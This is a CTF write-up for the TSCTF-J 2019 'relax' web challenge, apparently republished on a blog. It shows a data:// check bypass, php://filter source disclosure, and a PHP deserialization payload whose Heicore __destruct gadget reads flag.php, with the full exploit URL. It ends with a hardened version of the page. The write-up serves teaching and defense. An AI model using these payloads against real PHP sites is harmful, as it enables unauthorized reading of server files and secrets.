
【TSCTF-J 2019】relax

程序员文章站 2022-03-09 21:04:33

Challenge address: http://ctf.merak.codes

Opening it shows a site with nothing useful, so scan it~
Visiting /robots.txt reveals three files:

User-agent: *
Disallow: /relax.php
Disallow: /heicore.php
Disallow: /flag.php

Only /relax.php contains anything; view its source:
This is aaencode-obfuscated JavaScript. Run it directly in the browser console, or decode it online: https://www.qtool.net/decode
Cleaned up, it gives:

$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
    echo '<img src="./images/13.jpg" alt=""><br>';
    include($__);
} else {
    echo '<img src="./images/1.gif" alt="">';
}

The check file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three" can be bypassed with the data:// pseudo-protocol;
below it there is also include($__); I tried file=flag.php to include the flag, but it echoed "It's not that simple". I was too naive!
So I used the php://filter pseudo-protocol to read the source of heicore.php and relax.php.
heicore.php:

<?php
class Heicore{
	public $file;
	// Runs when the object is destroyed, e.g. after unserialize() returns
	public function __destruct(){
		if(isset($this->file)){
			echo file_get_contents($this->file);
		}
	}
}

relax.php:

<?php
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
$_ = $_GET['pw'];
$__ = $_GET['file'];
$___ = $_GET['(><)'];
if (isset($_) && (file_get_contents($_, 'r') === "Two thousand three hundred and thirty-three")) {
	echo '<img src="./images/13.jpg" alt=""><br>';
	// only the included file name is checked for "flag"; the serialized data is not
	if (preg_match("/flag/i", $__)) {
		echo "It's not that simple";
		exit();
	} else {
		include($__);
		unserialize($___);
	}
} else {
	echo '<img src="./images/1.gif" alt="">';
}
?>

Finally the complete source; it does indeed filter "flag".
The destructor in heicore.php echoes the contents of $file, so include that file and set its member $file to flag.php. Since unserialize() is called, we use deserialization to trigger the magic method __destruct() and print the flag;

<?php
class Heicore {
	// read flag.php through php://filter so the PHP source is returned base64-encoded instead of executed
	public $file = 'php://filter/read=convert.base64-encode/resource=flag.php';
}
$a = new Heicore();
$b = serialize($a);
echo $b;
#O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

The constructed payload:

?pw=data:text/plain,Two%20thousand%20three%20hundred%20and%20thirty-three&file=heicore.php&(><)=O:7:"Heicore":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

Decode the base64
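From the defender's side, here is an added hardened relax.php that closes the three weaknesses used above (it is not the challenge's own code); the secret file path, pages directory and allow-list are assumptions:

```php
<?php
// Hardened relax.php (added example, not the challenge's code).
// Assumed paths: the secret lives in secret/pw.txt, includable pages in pages/.
declare(strict_types=1);

const PW_FILE  = __DIR__ . '/secret/pw.txt';   // assumed location of the secret
const PAGES    = __DIR__ . '/pages';           // assumed directory of includable pages
const ALLOWED  = ['home.php', 'about.php'];    // assumed allow-list of page names

$pw   = $_GET['pw']   ?? '';
$file = $_GET['file'] ?? '';
$data = $_GET['(><)'] ?? '';

// 1. Never pass user input to file_get_contents(): the original read
//    file_get_contents($_GET['pw']), so a data:// URL satisfied the check.
//    Read the secret from a fixed server-side file and compare in constant time.
$expected = trim((string) file_get_contents(PW_FILE));
if ($pw === '' || !hash_equals($expected, $pw)) {
    echo '<img src="./images/1.gif" alt="">';
    exit;
}

// 2. Allow-list the included page instead of blacklisting the word "flag":
//    the deny-list let heicore.php through, and the payload never needed
//    "flag" in the file parameter at all.
if (!in_array($file, ALLOWED, true)) {
    http_response_code(400);
    exit('unknown page');
}
include PAGES . '/' . $file;

// 3. Do not unserialize() user input: any class with a __destruct() that
//    reads files (Heicore above) becomes a file-read gadget. Accept JSON,
//    which cannot instantiate objects, and validate its shape. If serialized
//    input is unavoidable, at least pass ['allowed_classes' => false].
$decoded = json_decode($data, true);
if ($data !== '' && !is_array($decoded)) {
    http_response_code(400);
    exit('bad data');
}
echo '<img src="./images/13.jpg" alt=""><br>';
```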

Related tags: CTF-Web